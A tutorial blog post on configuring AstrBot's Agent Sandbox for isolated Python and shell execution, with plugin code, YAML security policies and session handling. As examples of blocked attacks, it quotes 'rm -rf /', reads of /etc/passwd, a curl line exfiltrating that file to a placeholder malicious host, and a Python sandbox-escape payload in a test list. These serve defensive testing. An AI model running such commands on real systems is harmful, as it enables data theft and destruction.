How to Use AstrBot's Agent Sandbox for Safe Code Execution
Problem
When I built an AI chatbot that could execute Python code, I quickly ran into a scary realization: what if a user asks the bot to run os.system('rm -rf /') or reads sensitive files like /etc/passwd?
I tried using Python’s built-in exec() function:
def run_user_code(code: str): try: exec(code) except Exception as e: print(f"Error: {e}")
# A user sends this through my chatbotrun_user_code("import os; os.system('cat /etc/passwd')")This is obviously dangerous. The code runs with full privileges on my server.
Why Sandboxing Matters
The core problem with unrestricted code execution is attack surface. A malicious user could:
- Read sensitive files (credentials, config files)
- Delete critical data
- Make unauthorized network requests
- Consume all system resources (fork bombs, memory exhaustion)
- Pivot to other parts of the infrastructure
Traditional solutions like RestrictedPython only provide partial protection. They can restrict some builtins and attributes, but determined attackers can often bypass these restrictions through various Python internals.
What I needed was true isolation - a separate environment where code runs with limited capabilities, and failures don’t affect the host system.
What is AstrBot’s Agent Sandbox?
AstrBot is an open-source chatbot framework that includes a built-in Agent Sandbox feature. The sandbox provides isolated Python and shell execution environments for AI agents.
The architecture looks like this:
┌─────────────────────────────────────────────────────────────┐│ User/LLM Request │└─────────────────────────┬───────────────────────────────────┘ │ ▼┌─────────────────────────────────────────────────────────────┐│ Security Policy Check ││ ┌─────────────────────────────────────────────────────┐ ││ │ - Module whitelist/blacklist │ ││ │ - Command validation │ ││ │ - Resource limit enforcement │ ││ └─────────────────────────────────────────────────────┘ │└─────────────────────────┬───────────────────────────────────┘ │ ▼┌─────────────────────────────────────────────────────────────┐│ Isolated Runtime ││ ┌─────────────────────────────────────────────────────┐ ││ │ - Separate process/container │ ││ │ - Limited filesystem access │ ││ │ - Network restrictions │ ││ │ - Memory/CPU/time limits │ ││ └─────────────────────────────────────────────────────┘ │└─────────────────────────┬───────────────────────────────────┘ │ ▼┌─────────────────────────────────────────────────────────────┐│ Output Filter ││ ┌─────────────────────────────────────────────────────┐ ││ │ - Sanitize results │ ││ │ - Redact sensitive information │ ││ └─────────────────────────────────────────────────────┘ │└─────────────────────────┬───────────────────────────────────┘ │ ▼┌─────────────────────────────────────────────────────────────┐│ Safe Result │└─────────────────────────────────────────────────────────────┘Key capabilities:
- Python execution: Run Python code with restricted module access
- Shell execution: Execute shell commands with filtering
- Session management: Maintain state across multiple code executions
- Resource limits: Control memory, CPU, and execution time
- Web ChatUI integration: Access sandbox through AstrBot’s web interface
Setting Up the Sandbox
Prerequisites
- AstrBot installed (version 3.4.0 or later)
- Python 3.8+
- Docker (recommended for full isolation)
Installation
First, I cloned and installed AstrBot:
git clone https://github.com/Soulter/AstrBot.gitcd AstrBotpip install -r requirements.txtEnabling the Agent Sandbox
In the AstrBot configuration, I enabled the sandbox feature:
agent_sandbox: enabled: true backend: "docker" # or "local" for process isolation security_policy: restricted_modules: - os - subprocess - socket - ctypes - sys memory_limit: "256m" cpu_limit: 1 execution_timeout: 30 network_access: "restricted" allowed_commands: - ls - cat - grep - pythonThe backend option determines the isolation level:
docker: Full container isolation (recommended)local: Process-based isolation (lighter but less secure)
Executing Python Code Safely
Basic Code Execution
I created a simple plugin to execute user-provided Python code:
from astrbot.api.event import filter, AstrMessageEventfrom astrbot.api.star import Context, Star, register
@register("sandbox_executor", "author", "Safe code execution plugin", "1.0.0", "https://github.com/example")class SandboxExecutorPlugin(Star): @filter.command("run") async def execute_code(self, event: AstrMessageEvent): # Extract code from message: /run print('hello') code = event.get_plain_text().replace("/run ", "")
# Execute in sandbox result = await self.context.agent_sandbox.execute_python(code)
if result.get("error"): yield event.plain_result(f"Error: {result['error']}") elif result.get("security_violations"): yield event.plain_result("Blocked: Security violation detected") else: yield event.plain_result(f"Output: {result['output']}")When I tested with safe code:
User: /run print(2 + 2)Bot: Output: 4
User: /run [x**2 for x in range(10)]Bot: Output: [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]Handling Security Violations
When I tried to import restricted modules:
User: /run import os; os.system('whoami')Bot: Blocked: Security violation detectedThe sandbox detected the attempt to import os and blocked execution.
I also tested what happens with resource exhaustion attempts:
# This tries to consume all memoryx = []while True: x.append(' ' * 1000000)The sandbox killed the process after hitting the memory limit:
User: /run x = []\nwhile True:\n x.append(' ' * 1000000)Bot: Error: Memory limit exceeded (256MB)Safe Shell Command Execution
The sandbox also supports shell command execution with filtering:
from astrbot.api.event import filter, AstrMessageEventfrom astrbot.api.star import Context, Star, register
@register("shell_executor", "author", "Shell command plugin", "1.0.0", "https://github.com/example")class ShellExecutorPlugin(Star): @filter.command("shell") async def execute_shell(self, event: AstrMessageEvent): command = event.get_plain_text().replace("/shell ", "")
# Execute shell command in sandbox result = await self.context.agent_sandbox.execute_shell(command)
if result.get("blocked"): yield event.plain_result(f"Blocked: {result['reason']}") elif result.get("error"): yield event.plain_result(f"Error: {result['error']}") else: yield event.plain_result(f"Output:\n{result['output']}")Testing with allowed commands:
User: /shell ls -laBot: Output:total 8drwxr-xr-x 2 root root 4096 Mar 3 10:00 .drwxr-xr-x 3 root root 4096 Mar 3 10:00 ..But dangerous commands get blocked:
User: /shell rm -rf /Bot: Blocked: Command 'rm' not in allowed list
User: /shell curl http://malicious-site.com/exfil?data=$(cat /etc/passwd)Bot: Blocked: Command 'curl' not in allowed listSession-Level Resource Management
One powerful feature is session-based execution. This allows maintaining state across multiple code runs within a session.
Why Sessions Matter
Without sessions, each code execution starts fresh. But sometimes I need to:
- Load a large dataset once, then query it multiple times
- Train a model incrementally
- Maintain variables across conversation turns
Using Sessions
from astrbot.api.event import filter, AstrMessageEventfrom astrbot.api.star import Context, Star, register
@register("session_executor", "author", "Session-based execution", "1.0.0", "https://github.com/example")class SessionExecutorPlugin(Star): def __init__(self, context: Context): super().__init__(context) self.sessions = {} # user_id -> session_id
@filter.command("session_start") async def start_session(self, event: AstrMessageEvent): user_id = event.get_sender_id()
# Create a new sandbox session session_id = await self.context.agent_sandbox.create_session( user_id=user_id, timeout=300, # 5 minute session memory_limit="512m" )
self.sessions[user_id] = session_id yield event.plain_result(f"Session started: {session_id[:8]}...")
@filter.command("srun") async def execute_in_session(self, event: AstrMessageEvent): user_id = event.get_sender_id() session_id = self.sessions.get(user_id)
if not session_id: yield event.plain_result("No active session. Use /session_start first.") return
code = event.get_plain_text().replace("/srun ", "")
# Execute in existing session (state persists) result = await self.context.agent_sandbox.execute_python( code, session_id=session_id )
yield event.plain_result(f"Output: {result.get('output', result.get('error'))}")
@filter.command("session_end") async def end_session(self, event: AstrMessageEvent): user_id = event.get_sender_id() session_id = self.sessions.pop(user_id, None)
if session_id: await self.context.agent_sandbox.destroy_session(session_id) yield event.plain_result("Session ended and resources cleaned up.") else: yield event.plain_result("No active session to end.")A practical example - loading and analyzing data:
User: /session_startBot: Session started: a1b2c3d4...
User: /srun import pandas as pdBot: Output: None
User: /srun df = pd.read_csv('data.csv') # Pre-uploaded fileBot: Output: None
User: /srun df.head()Bot: Output: id name value0 1 Alice 1001 2 Bob 2002 3 Charlie 150
User: /srun df['value'].mean()Bot: Output: 150.0
User: /session_endBot: Session ended and resources cleaned up.The session kept df in memory across multiple executions.
Session Lifecycle
The session lifecycle follows this pattern:
┌────────────────┐│ Create Session │ ──→ Allocate resources, assign session_id└───────┬────────┘ │ ▼┌────────────────┐│ Execute Code │ ──→ Run in session context (state persists)└───────┬────────┘ │ ▼┌────────────────┐│ Execute More │ ──→ Previous variables/functions available└───────┬────────┘ │ ▼┌────────────────┐│ Destroy Session│ ──→ Clean up memory, release resources└────────────────┘Sessions automatically expire after the configured timeout, preventing resource leaks from abandoned sessions.
Using the Sandbox via Web ChatUI
AstrBot includes a web interface that integrates with the sandbox. After starting AstrBot with the web plugin:
python main.py --webThe web interface is available at http://localhost:6185.
In the ChatUI, I can enable agent mode which allows the AI to execute code through the sandbox. When the AI needs to run calculations or process data, it automatically uses the sandbox.
The ChatUI shows:
- Code being executed
- Output or errors
- Execution time
- Resource usage
This is useful for:
- Quick data analysis tasks
- Mathematical computations
- File processing workflows
Advanced Security Configuration
Custom Module Restrictions
I can fine-tune which modules are allowed:
agent_sandbox: security_policy: # Completely block these modules restricted_modules: - os - subprocess - socket - ctypes - sys - importlib - builtins
# Allow specific functions from otherwise restricted modules module_overrides: os.path: allowed: true functions: - join - basename - dirname - exists
# Whitelist approach (more secure but restrictive) mode: "whitelist" allowed_modules: - math - json - re - datetime - collectionsNetwork Access Control
For use cases requiring network access (like web search):
agent_sandbox: security_policy: network_access: "restricted" allowed_domains: - "api.openai.com" - "search.example.com" # Block all other network requestsResource Limits
Adjust limits based on expected workload:
agent_sandbox: security_policy: memory_limit: "512m" # Per execution cpu_limit: 2 # Number of CPU cores execution_timeout: 60 # Seconds max_output_size: "10m" # Limit output size max_file_size: "100m" # Limit file operationsBest Practices
What I Learned the Hard Way
-
Start restrictive, then relax: Begin with a whitelist approach and add permissions as needed, rather than starting permissive and trying to tighten later.
-
Test with real attack patterns: I created a test suite with common attack vectors:
tests/test_sandbox_security.py ATTACK_VECTORS = ["import os; os.system('id')","__import__('subprocess').call(['cat', '/etc/passwd'])","exec(open('/etc/passwd').read())","().__class__.__bases__[0].__subclasses__()[137]('id', shell=True).communicate()",] -
Monitor resource usage: Even with limits, track CPU/memory trends to catch slow resource leaks.
-
Log everything: Security events, violations, and execution patterns help identify attack attempts.
-
Session cleanup is critical: Always implement session cleanup, especially for web applications where users might not explicitly end sessions.
Common Mistakes
-
Relying only on module restrictions: Advanced attackers can use Python’s introspection to access blocked functionality. Always use container/process isolation as the primary defense.
-
Ignoring timeout configuration: A complex computation might hang indefinitely without proper timeout settings.
-
Allowing too many shell commands: Each allowed command is potential attack surface. The
allowed_commandslist should be minimal. -
Not handling errors gracefully: Exposing internal error messages can leak system information. Sanitize error output.
The Reason
The key insight is that secure code execution requires multiple layers of defense:
- Container/process isolation prevents direct system access
- Module restrictions limit what the code can import
- Resource limits prevent denial-of-service attacks
- Command filtering controls shell execution
- Session management prevents resource leaks
No single layer is sufficient, but together they provide strong protection.
Summary
In this post, I showed how to use AstrBot’s Agent Sandbox for secure code execution. I covered setting up the sandbox, executing Python and shell commands safely, managing sessions for stateful execution, and configuring security policies.
The key point is that sandboxing AI-generated code requires defense in depth - isolation, restrictions, limits, and monitoring all working together. AstrBot’s built-in sandbox provides these layers out of the box, making it easier to build secure AI agents.
Final Words + More Resources
My intention with this article was to help others share my knowledge and experience. If you want to contact me, you can contact by email: Email me
Here are also the most important links from this article along with some further resources that will help you in this scope:
- 👨💻 AstrBot GitHub Repository
- 👨💻 AstrBot Documentation
- 👨💻 llm-sandbox
- 👨💻 OWASP Code Injection Prevention
Oh, and if you found these resources useful, don’t forget to support me by starring the repo on GitHub!
Comments